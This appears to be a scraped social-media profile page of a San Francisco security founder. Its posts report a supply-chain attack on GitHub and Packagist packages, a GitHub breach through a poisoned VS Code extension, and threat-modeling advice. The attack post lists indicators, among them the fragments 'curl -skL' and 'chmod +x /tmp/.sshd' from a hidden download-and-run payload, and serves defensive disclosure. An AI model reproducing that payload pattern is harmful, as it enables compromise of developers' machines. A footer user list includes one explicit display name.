Olivia
Online
Dan Le
@danle
Cybersecurity as a Service for defense fintech, healthtech, startups. ๐ฆ We make security & compliance easier. ๐ Founder of @RedCupIT ๐ SF
San Francisco, CA
Joined October 2008
4.1K Following
782 Followers
1.5K Posts
โผ๏ธ๐จ BREAKING: Another supply chain attack. 700+ GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages.
8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies.
The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected.
IOCs:
GitHub account parikhpreyash4
repo systemd-network-helper-aa5c751f
drop path /tmp/.sshd
command fragments curl -skL and chmod +x /tmp/.sshd.
Endpoint security and knowing whatโs installed on your device is more important than ever.
Managing risk means controlling the flow of data into and out of your boundary, whether thatโs your browser, IDE, VPS, SaaS, AI agent, or endpoint device.
BRB while I reformat all of our computers ๐โโ๏ธ
1/ We are sharing additional details regarding our investigation into unauthorized access to GitHub's internal repositories.
Yesterday we detected and contained a compromise of an employee device involving a poisoned VS Code extension. We removed the malicious extension version, isolated the endpoint, and began incident response immediately.
Wow. Goodbye supply chain security. Time to move to air-gapped repositories and CI/CD.
2/ Our current assessment is that the activity involved exfiltration of GitHub-internal repositories only. The attackerโs current claims of ~3,800 repositories are directionally consistent with our investigation so far.
Modern Threat Modeling 101 Tip:
Before Mythos came out we warned everyone to go into turtle mode in case your late to the game (get everything off the internet as possible).
In case your super late to the game, get your employee SaaS apps off the internet. Almost all SaaS has SP-Initiated authentication built in to the implementation. Moreover, attackers are going to find authentication "bypasses" much easier now. SP-initiated authentication makes the SaaS enumerable from the internet for easy targeting.
Now is not the time to have things on the internet. MFA will not save you. We left that era a couple years ago.
You should be behind your SASE/ZTNA solution's dedicated IPs.
If you are not requiring managed assets to access cloud resources, rhat means your cloud resources are accessible from the internet. Understand now?
@jimbelosic I just ran through 6 brick walls!! LFGGGGGG
CONGRATS!!
Today is a hard day. I shared this note with the @linear team today: Weโve made the difficult decision to increase our workforce. This is not a cost-cutting exercise or a reflection of anyoneโs performance. Weโre simply reimagining every role for the agentic AI era. Weโre hiring. Weโre sorry about that.
@sporadica Datacenter hand me downs!
@browser_use Would love a sweater! Can I swing by the SF office?
@steipete Roasted lobster ๐ฆ
Had this exact conversation today!
kinda ironic how the average work day is getting _harder_, as we progressively automate the easier parts of our daily jobs offloading them to agents. net result is that the average complexity of the tasks we still get to do is actually increasing
insofar as we decide to still work the same number of hours (if not more), the more we offload to agents the harder our days will get
lots of obvious confounders so not exactly direct causality, but since opus 4.5 i feel so much more tired. i get to accomplish crazy more - probably now doing what last year would've considered 3-4 distinct jobs, all at the same time. but at what price?
pretty sure the current general anxiety in tech is not just that. could quite simply be lots of tiredness as we no longer get to code for hours in quiet flow, and have to uniquely narrow our focus to only the hardest pieces
(or maybe i'm just projecting because this race is killing me lmao)
@tobi In 2026, CEO = Context Engineering Officer
@garrytan Gotta code with 2 MacBook Pros to load balance! Haha
@cyb3rops This is so good and so true. Inspired to build today!!!!!
@lucknite @openclaw @steipete @lucknite Worked with Claude to fix the codebase from a Purple Team perspective. Had it look at @elder_plinius repos for inspiration on how to harden
Submitted a PR where the score is now 100/100! https://t.co/uQ1vbViJNb
@JustJake Very true! With the amount of new clawd skills and connections being built daily, the attack surface is growing exponentially
Last Seen Users on Sotwe
ABOALABAS
Seen from Oman
Pussy Farts In Doggystyle
Seen from Turkey
Nisa Bal
Seen from United States
M Badra
Seen from Egypt
่้ดๅทฅๅ
ทไบบ
Seen from United States
Toba
Seen from Netherlands
AfroDaddy
Seen from United States
Naomi
Seen from Indonesia
Bapak lokal
Seen from Indonesia
tantebecek
Seen from Singapore
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.3M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.7M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.3M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers